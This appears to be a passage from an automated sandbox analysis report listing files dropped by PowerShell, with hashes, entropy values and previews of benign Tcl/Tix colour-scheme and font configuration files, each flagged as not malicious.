                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1064
                                                                                                                                                                                                                      Entropy (8bit):4.610061079205595
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJE1HHxb7S2svnNpEapAXaJpXNXFQ/Xpd/dvl5XkxX1rB4ov:JAxb7SJvNpEapAsp98Z99llA1l4ov
                                                                                                                                                                                                                      MD5:1446E52BFFE7E1DB0399AFB123DC693A
                                                                                                                                                                                                                      SHA1:C8157F1199E25C1DBA6ABF9DBB06FCC876B4BDAE
                                                                                                                                                                                                                      SHA-256:D875F29B4A7C0E462396C40BB9B5B2798D777D53E3DC51280C11222FF5B40E25
                                                                                                                                                                                                                      SHA-512:DDCFDD6C10050F81D5E0C27750AB9B4903B7DEA6BEF7B3D044B73853A5C6EB46A409736C5F0289D3ADB1640C76C976BE1466DF4379F7A260164D73F62E418F36
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: SGIGray.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray50.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray50.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray90.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray35.... set tixOption(input1_bg) rosybrown.. set tixOption(input2_bg) rosybrown.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixOption(select
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22876
                                                                                                                                                                                                                      Entropy (8bit):4.894409599797038
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:2Vn5Ivo4ybbTpff8Qp8t0Q0vAwYPesp8Qp8EvAEgVn5Ivo4ybbTpff8Qp8t0Q0vy:2VneNvAEgVneNvAEF
                                                                                                                                                                                                                      MD5:FE888C35A1341EDBEC9F8A5751D75FD0
                                                                                                                                                                                                                      SHA1:C1F77499B52C7C1E7DE6BF56DFB990591327C2FC
                                                                                                                                                                                                                      SHA-256:FEB596C01617784556B7E11D3FB29F0F6453D4DA3A46E60405109F90E9F4E573
                                                                                                                                                                                                                      SHA-512:F39DA4EFEB6EAD47D090587E6ACE9C751486957EE5EBCA7AA56F6A6A613E7FA3539D173CC5B2BF0189F04D0F6AAC7EF8A7CDF17CD22E37C2DAD320A1BCBD2701
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: SGIGray.csc,v 1.2 2000/10/12 02:00:00 idiscovery Exp $..#..proc tixPref:SetScheme-Color:SGIGray {} {...... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray50.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray50.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray90.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray35.... set tixOption(input1_bg) rosybrown.. set tixOption(input2_bg) rosybrown.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1059
                                                                                                                                                                                                                      Entropy (8bit):4.64921362374022
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJN1HAxw7SLvSE/AXbpXNXO4XpdjdvksgkI1rB4dh:JUxw7SLvSE/Arp9FZV9jg91l4dh
                                                                                                                                                                                                                      MD5:6EF77893A5687E223EA0215B17B47963
                                                                                                                                                                                                                      SHA1:A101AAD298BB37FDC52336DA1F5787352FECDC2B
                                                                                                                                                                                                                      SHA-256:776AE50D94A64DF358AE46D8FA8C5EB493FDC664696167548A0311D0E897C6E9
                                                                                                                                                                                                                      SHA-512:1255275210D5CABC8241333947A516CF25A7EFEC6ADBB2873E8723F8656113F9ED10EEF8DF775423FFD32C6098D4FE7277FC473B80AD36C1B9EE3DF5D6BB9737
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TK.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.. global tixOption.... set tixOption(bg) #d9d9d9.. set tixOption(fg) black.... set tixOption(dark1_bg) #c3c3c3.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) #a3a3a3.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) #a3a3a3.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) #ececec.. set tixOption(light1_fg) white.. set tixOption(light2_bg) #fcfcfc.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) #d9d9d9.. set tixOption(input2_bg) #d9d9d9.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixOption(select
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2095
                                                                                                                                                                                                                      Entropy (8bit):4.604885735258949
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Jqxw7SLvSE/Arp9FZV9jg91l4d7xb7SqpvopGzNAsp98Z7p9jsZtvq9ik:Jdk
                                                                                                                                                                                                                      MD5:03D8A2FF2E968AD3385F2E380DA48C7E
                                                                                                                                                                                                                      SHA1:A81B12A5067ABC405BA02AFE7700ADCBF6628D2F
                                                                                                                                                                                                                      SHA-256:85B07443A34F2D04C6603654F2D0B7637C7EC4B2394CC025114804B47BFC205C
                                                                                                                                                                                                                      SHA-512:CDA38AF87057F3C530766817002B8B5D98C609984CE27897DA6AA622EDD5EE2A01648214F0ACBB9C14811EE90CB62A0690F0377F6ED527C7C7D7D23D75182A86
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TK.csc,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixPref:SetScheme-Color:TK {} {.... global tixOption.... set tixOption(bg) #d9d9d9.. set tixOption(fg) black.... set tixOption(dark1_bg) #c3c3c3.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) #a3a3a3.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) #a3a3a3.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) #ececec.. set tixOption(light1_fg) white.. set tixOption(light2_bg) #fcfcfc.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) #d9d9d9.. set tixOption(input2_bg) #d9d9d9.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixOp
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):522
                                                                                                                                                                                                                      Entropy (8bit):4.912709471724692
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJ3AT03wVOWIeI4/JhAIcthAI0hthAIzEAIRDBCBoIF:nJ74DxTRhAnthAXthAYEAOdCOk
                                                                                                                                                                                                                      MD5:D558746FECF25A369492A138F0FFC746
                                                                                                                                                                                                                      SHA1:3C5E4AEEA6A6B41E37E6D12E89A0F6939A6B168E
                                                                                                                                                                                                                      SHA-256:59A38DDDE6AB3349DAE5A81F4E5C889E99A8752336FE5599FF0A385C71FA129B
                                                                                                                                                                                                                      SHA-512:B109A22BA6A74DA3DD5EEA51C75D9EE65441F2448011FCF528E0FD4BCB08208C43C74FA2BEFD19552D4AF8ADFF79B36F902A7CD19BCD65104A2F468B44124358
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TK.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetFontset {} {.... global tixOption.... set tixOption(font) -Adobe-Helvetica-Medium-R-Normal--*-120-*.. set tixOption(bold_font) -Adobe-Helvetica-Bold-R-Normal--*-120-*.. set tixOption(menu_font) -Adobe-Helvetica-Bold-R-Normal--*-120-*.. set tixOption(italic_font) -Adobe-Helvetica-Bold-O-Normal--*-120-*.. set tixOption(fixed_font) -*-courier-medium-r-*-*-14-*-*-*-*-*-*-*.. set tixOption(border1) 1..}....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):588
                                                                                                                                                                                                                      Entropy (8bit):4.989882253286682
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:nJ6ET0sxieDIeI4/JhAIcthAI0hthAIzEAIRDBCBoIl45xiwDfID:nJYQieDxTRhAnthAXthAYEAOdCODiSC
                                                                                                                                                                                                                      MD5:1738FE8526075A18CBEAF0577EC50F24
                                                                                                                                                                                                                      SHA1:78E643D2CE54875943F5A60F2A408AD76DFED367
                                                                                                                                                                                                                      SHA-256:8D60DBD699430F60471971F7431E2AE769A46DA938DBFE79765375A30CE2F176
                                                                                                                                                                                                                      SHA-512:E155E287050488629F398CE899F0883626330B48F19D0E72143BCE9E1335E5A826360F4C97984C2F93D88127A9D7BEBDD0395AC2637A0EF5A4AA2D1ED985CD1E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TK.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixPref:InitFontSet:TK {} { ...... global tixOption.... set tixOption(font) -Adobe-Helvetica-Medium-R-Normal--*-120-*.. set tixOption(bold_font) -Adobe-Helvetica-Bold-R-Normal--*-120-*.. set tixOption(menu_font) -Adobe-Helvetica-Bold-R-Normal--*-120-*.. set tixOption(italic_font) -Adobe-Helvetica-Bold-O-Normal--*-120-*.. set tixOption(fixed_font) -*-courier-medium-r-*-*-14-*-*-*-*-*-*-*.. set tixOption(border1) 1....}..proc tixPref:SetFontSet:TK {} { ..global tixOption..}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                                      Entropy (8bit):4.622012687200833
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJ01HHxb7S2qvn6EdAXa5XNXFQ/XpdjdvksmQ/kOQ/1rB4ob:JQxb7S/v6EdAc98ZV9jD41l4ob
                                                                                                                                                                                                                      MD5:6273880E6FDB5256924103503E07799D
                                                                                                                                                                                                                      SHA1:869D379FF21E9FF9A20715264308693B8840FA37
                                                                                                                                                                                                                      SHA-256:BA5807E0AB2867B6E31FB2539B61C4F1253474A07767DCED095C806E61D2AA4C
                                                                                                                                                                                                                      SHA-512:67A4A36D5021B66D2C32D49B0B4C3EB313C2D9A0D45076919DBB1DC95ECCEBF0847768207A94D1749335811524F28CE1D480616E873E50232A66E07021B321C8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TixGray.cs,v 1.1.1.1 2000/05/17 11:08:47 idiscovery Exp $..#..proc tixSetScheme-Color {} {.... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray86.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray77.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray77.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray92.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) gray95.. set tixOption(input2_bg) gray95.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set tixOption(sele
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22878
                                                                                                                                                                                                                      Entropy (8bit):4.894502873305867
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:1Vn5Ivo4ybbTpff8Qp8t0Q0vAwYPesp8Qp8EvAEEVn5Ivo4ybbTpff8Qp8t0Q0vy:1VneNvAEEVneNvAEF
                                                                                                                                                                                                                      MD5:314DB2A7090A6FF7713579D99DB52179
                                                                                                                                                                                                                      SHA1:C75EA458979B8D4E391CD758DD8A79102D6307BF
                                                                                                                                                                                                                      SHA-256:4805333C38118A33B9F7918601FBF23B66EAD7280A21F962165EAF8E788E32D0
                                                                                                                                                                                                                      SHA-512:D5D9A953D1A3479B8F1E8F6A2E1B89BFA61F9D3F398645B039BE9E5C42B85FB4077EE1493FAE37A0456B97F9C803CB0D1DBCD172E35C45296CB8C0A471487810
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TixGray.csc,v 1.2 2000/10/12 02:00:25 idiscovery Exp $..#..proc tixPref:SetScheme-Color:TixGray {} {...... global tixOption.... set tixOption(bg) lightgray.. set tixOption(fg) black.... set tixOption(dark1_bg) gray86.. set tixOption(dark1_fg) black.. set tixOption(dark2_bg) gray77.. set tixOption(dark2_fg) black.. set tixOption(inactive_bg) gray77.. set tixOption(inactive_fg) black.... set tixOption(light1_bg) gray92.. set tixOption(light1_fg) white.. set tixOption(light2_bg) gray95.. set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) gray55.... set tixOption(input1_bg) gray95.. set tixOption(input2_bg) gray95.. set tixOption(output1_bg) $tixOption(dark1_bg).. set tixOption(output2_bg) $tixOption(bg).... set tixOption(select_fg) black.. set ti
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2314
                                                                                                                                                                                                                      Entropy (8bit):4.607647666190131
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:JwDHxo7jpbuEK9RiX4ZV9eOC+ZlVpqxo7jpbuEK9RiX4ZV9eqXC+ZlVpM:Jwz
                                                                                                                                                                                                                      MD5:A17308169037BC17C818C69D4C236621
                                                                                                                                                                                                                      SHA1:C8F987C17DEF129F38E1F55A8308B157D616AABA
                                                                                                                                                                                                                      SHA-256:153F6332172525BE0EE58A80BF8515D400D0D829078CAA3E1FE3BDB7F6B5C389
                                                                                                                                                                                                                      SHA-512:1795E131B44A52226787695391EFE33228D031EE6C4F55D9A6CECA2D950CBC9D439160B0D2AC55705F6067F72C90FC30128E8DBBF2DABDDC08ECEFFF3F63BAF9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TkWin.cs,v 1.1 2000/10/12 01:41:04 idiscovery Exp $..#..proc tixSetScheme-Color {} {.. global tixOption.... set tixOption(bg) SystemButtonFace.. set tixOption(fg) SystemButtonText.... set tixOption(dark1_bg) SystemScrollbar.. set tixOption(dark1_fg) SystemButtonText..# set tixOption(dark2_bg) SystemDisabledText..# set tixOption(dark2_fg) black.. set tixOption(inactive_bg) SystemButtonFace.. set tixOption(inactive_fg) SystemButtonText.... set tixOption(light1_bg) SystemButtonFace..# set tixOption(light1_fg) white..# set tixOption(light2_bg) #fcfcfc..# set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) SystemDisabledText.... set tixOption(input1_bg) SystemWindow..# set tixOption(input2_bg) ..# set tixOption(output1_bg) $tixOption(dark1_bg)..# set t
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):22635
                                                                                                                                                                                                                      Entropy (8bit):4.916895573126345
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Q/nH5Tf8QpYN080vAwYPeYB8Qp8EtArMlnGIvo4S/nH5Tf8QpYN080vAwYPeYB87:x1tArMlnv1tArMlnw
                                                                                                                                                                                                                      MD5:59EB8EBFFB60576061907FC348DE5B43
                                                                                                                                                                                                                      SHA1:855001840B3E51170EAF6436D340F5D2E7AC8C0B
                                                                                                                                                                                                                      SHA-256:88EDDA70C62895AD58DF9BB8F2AF3E8246C134269EEB9855AB1D70EA7B7B92B0
                                                                                                                                                                                                                      SHA-512:4F443395E5A4F6FBB66BFC52BEADE508A9952DE107A2FDAD8B887D42C48EDA3003FC92B72D05E4126E83E8CF230D3BB11E2C1093D7001D95CBA06B4EAD8C277D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TkWin.csc,v 1.2 2002/01/24 09:16:22 idiscovery Exp $..#..proc tixPref:SetScheme-Color:TkWin {} {.. global tixOption.... set tixOption(bg) SystemButtonFace.. set tixOption(fg) SystemButtonText.... set tixOption(dark1_bg) SystemScrollbar.. set tixOption(dark1_fg) SystemButtonText..# set tixOption(dark2_bg) SystemDisabledText..# set tixOption(dark2_fg) black.. set tixOption(inactive_bg) SystemButtonFace.. set tixOption(inactive_fg) SystemButtonText.... set tixOption(light1_bg) SystemButtonFace..# set tixOption(light1_fg) white..# set tixOption(light2_bg) #fcfcfc..# set tixOption(light2_fg) white.... set tixOption(active_bg) $tixOption(dark1_bg).. set tixOption(active_fg) $tixOption(fg).. set tixOption(disabled_fg) SystemDisabledText.... set tixOption(input1_bg) SystemWindow..# set tixOption(input2_bg) ..# set tixOption(output1_bg) $tixOption(dark1_bg).
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):406
                                                                                                                                                                                                                      Entropy (8bit):4.73187061686457
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:n/BO/F+kpN23SRguVwdYhIEBfItCZfIKDbW/fIacM3fIMOrZfI2CKgBZfIyla:nJCT03wVOWIeI4RIOsI0PIhrRIRxRIF
                                                                                                                                                                                                                      MD5:73A006F636DCD6168D28AA5F805B9E0E
                                                                                                                                                                                                                      SHA1:508E3DE5001EF2426833AD39D5F0B518AA3EE0B8
                                                                                                                                                                                                                      SHA-256:B51BF585A338AB96BFF080855182A5E29330EE2CF7716463914F017FA7AC02BA
                                                                                                                                                                                                                      SHA-512:79CB6C440E86BC90522BE77F28C0B87633BF1D58B36564BE3A106164590D0CF61F1705D2E1C5AD59FBB5E4BE5E0DA81B3DD11DCDC110C286B8EDBA8EDA2ABE97
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TkWin.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetFontset {} {.... global tixOption.... set tixOption(font) "windows-message".. set tixOption(bold_font) "windows-status".. set tixOption(menu_font) "windows-menu".. set tixOption(italic_font) "windows-message".. set tixOption(fixed_font) "systemfixed".. set tixOption(border1) 1..}....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1708
                                                                                                                                                                                                                      Entropy (8bit):4.815374070061481
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nJGQweDxJRPshYROTDwSfAFN5FNH8FNXFNQFNlFN7FNMMFN6FNq8FNcFNIFNsLFI:JzNDxbPsh8eDdHPv
                                                                                                                                                                                                                      MD5:1A4EB2FFBB68F9F53BDCA6B18D74D411
                                                                                                                                                                                                                      SHA1:A1C6DFC95586E9B987671A93CA8B07644756BE1C
                                                                                                                                                                                                                      SHA-256:9FE061AA39E450768C58E77AA39B0EA9C980E60D8F9505AFA9934D5439B6758A
                                                                                                                                                                                                                      SHA-512:B32322D64584DF7673A61FC5CC1DFA4539F6C832D394F18E45B86AAA174AD868D1AB7B6EE6BFED94670B6EC36EDC35E2045F798E1EB9DF7B4AC866321C7D7B46
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# $Id: TkWin.fsc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..proc tixPref:InitFontSet:TkWin {} { ...... global tixOption.... set tixOption(font) "windows-message".. set tixOption(bold_font) "windows-status".. set tixOption(menu_font) "windows-menu".. set tixOption(italic_font) "windows-message".. set tixOption(fixed_font) "systemfixed".. set tixOption(border1) 1....}..proc tixPref:SetFontSet:TkWin {} { ..global tixOption..option add *Menu.font...$tixOption(menu_font) $tixOption(prioLevel)..option add *TixMenu.font...$tixOption(menu_font) $tixOption(prioLevel)..option add *Menubutton.font...$tixOption(menu_font) $tixOption(prioLevel)..option add *Label.font .$tixOption(bold_font) $tixOption(prioLevel)..option add *Scale.font...$tixOption(italic_font) $tixOption(prioLevel)..option add *TixBalloon*Label.font ...$tixOption(font) $tixOption(prioLevel)..option add *TixBitmapButton*label.font ...$tixOption(font) $tixOption(prioLeve
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1497
                                                                                                                                                                                                                      Entropy (8bit):4.85005336935551
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:M2usaaGAqMlqFxAe7E7ruc1EPxyB3ZXfTRXMfyB1F/7odQqdEYgoqtyVaL9Xfgpt:jqJ3Y7ic65e3ZLROe1x8PJMiaZPIFEqh
                                                                                                                                                                                                                      MD5:6C7F253929ECF65E5DF10174403BF281
                                                                                                                                                                                                                      SHA1:0E5827D82EAC09A7D245F07C4AF8A1D5EFBEE47C
                                                                                                                                                                                                                      SHA-256:638882F34BB3CAEEF3F0F1BD4997A123DE116AF0B16289E62A537E4E63F6827A
                                                                                                                                                                                                                      SHA-512:73227DE268DF0CE3510F529AEC731DD273DA641E3AF8A299AB25468D94CBD7AAD41FAA1BCB9D429E7B7089606568D2721D85E1E75CA2B013BD001A0E59F9D0C4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WmDefault.cs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetScheme-Color {} {.. global tixOption.... package require wm_default.. if {![info exists ::wm_default::wm]} {...wm_default::setup...wm_default::addoptions.. }.... set tixOption(bg) $::wm_default::background.. set tixOption(fg) $::wm_default::foreground.... set tixOption(dark1_bg) #808080.... set tixOption(inactive_bg) $::wm_default::disabledbackground.. set tixOption(inactive_fg) black; # unused.... # light1 was used for listbox widgets and trough colors.. set tixOption(light1_bg) $::wm_default::scrollbars.. set tixOption(light1_fg) white; # unused.... # text is now used for listbox widgets.. set tixOption(list_bg) .$::wm_default::textbackground.... set tixOption(active_bg) $::wm_default::activebackground.. set tixOption(active_fg) $::wm_defau
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):14882
                                                                                                                                                                                                                      Entropy (8bit):4.9459663943663195
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:MJexEIukPJTR/wOv0zjv86UcygjHoTv17b9jk6KRqJzHDFEihoBW8aUsNY00jvoK:MJeSDNGTg6KRqJzOuZ7C
                                                                                                                                                                                                                      MD5:DD8A2DC54B8ED1A4E64E522D1414EC21
                                                                                                                                                                                                                      SHA1:2384ACCD4B058E3A96E0A02C2AB93C0A37112B1A
                                                                                                                                                                                                                      SHA-256:F32A52BACAF45CEE173D6D4982A39A9734BA510DB15F081D5CB6A9F2FF955700
                                                                                                                                                                                                                      SHA-512:DDAADBE8FC8B164658D7D8D4DB8E48B9491A84A72EE918C86C971862EE2D054E59CBCAE59495466519A679BB5477368E0F519C35C98454CD2ED4E91BADDD3E03
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WmDefault.csc,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#..#....proc tixPref:SetScheme-Color:WmDefault {args} {.. global tixOption.... package require wm_default.. if {![info exists ::wm_default::wm]} {...wm_default::setup...wm_default::addoptions.. }.... set tixOption(bg) $::wm_default::background.. set tixOption(fg) $::wm_default::foreground.... # was "#808080".. set tixOption(dark1_bg) $::wm_default::disabledbackground.... set tixOption(inactive_bg) $::wm_default::disabledbackground.. set tixOption(inactive_fg) black; # unused.... # light1 was used for listbox widgets and trough colors.. set tixOption(light1_bg) $::wm_default::scrollbars.. set tixOption(light1_fg) white; #unused.... # text is now used for listbox widgets.. set tixOption(list_bg) .$::wm_default::textbackground.... set tixOption(active_bg) $::wm_d
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):778
                                                                                                                                                                                                                      Entropy (8bit):4.888219510914746
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:M2usaL40qMlqFxAeYbqlRtxKOjQdDbBpP9:UqJ36OzonFh9
                                                                                                                                                                                                                      MD5:A99642562238E4A9E66FB14D80734113
                                                                                                                                                                                                                      SHA1:C54E379649C7C7C896680A1A95B51FC96FABD056
                                                                                                                                                                                                                      SHA-256:3C95D51B28CDF09C97990E6BA11B1F3E294419ED678771E2054115E7FB002BB4
                                                                                                                                                                                                                      SHA-512:1873D83CA14131A95E131F9C68FA76BBBF9394C0EEE19F06FE2FB870AD3C936531823F5209D850D22BC21B32BCFFA402FD77054679843EAEB9120D0464C7A6E0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WmDefault.fs,v 1.2 2001/12/09 05:03:09 idiscovery Exp $..#....proc tixSetFontset {} {.. global tixOption.... package require wm_default.. if {![info exists ::wm_default::wm]} {...wm_default::setup...wm_default::addoptions.. }.... set tixOption(font) .$::wm_default::system_font.. set tixOption(bold_font) [concat $::wm_default::system_font bold].. set tixOption(menu_font) $::wm_default::menu_font .. set tixOption(italic_font) [concat $::wm_default::system_font italic].. set tixOption(fixed_font) $::wm_default::fixed_font.. set tixOption(text_font) $::wm_default::text_font.. set tixOption(border1) $::wm_default::borderwidth....}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2241
                                                                                                                                                                                                                      Entropy (8bit):4.878459930106936
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:M2usaIbMlqFxAeYbqlRtxKOjQdDpPzMlqFxA+9YbqlRtxKOjQdDRBpPcb8q8Mr8y:PJ36OzonhzJX6OzonjhNZrmv
                                                                                                                                                                                                                      MD5:C7FCEB2589D31E490CEDE13DEE1FFE51
